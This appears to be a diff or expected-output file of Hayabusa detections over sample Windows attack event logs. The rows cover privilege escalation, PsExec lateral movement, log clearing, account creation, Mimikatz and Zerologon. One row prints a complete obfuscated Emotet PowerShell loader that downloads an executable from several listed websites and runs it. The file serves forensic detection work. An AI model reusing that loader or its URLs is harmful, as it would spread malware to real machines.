+2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,info,,PwSh Scriptblock Log,"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::""SecURi`T`ypRO`T`oCOL"" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').""S`Plit""([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.""d`OWN`load`FIlE""($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).""le`NgTH"" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx
+2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx
+2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx
+2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx
+2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
+2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
+2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
+2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
+2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
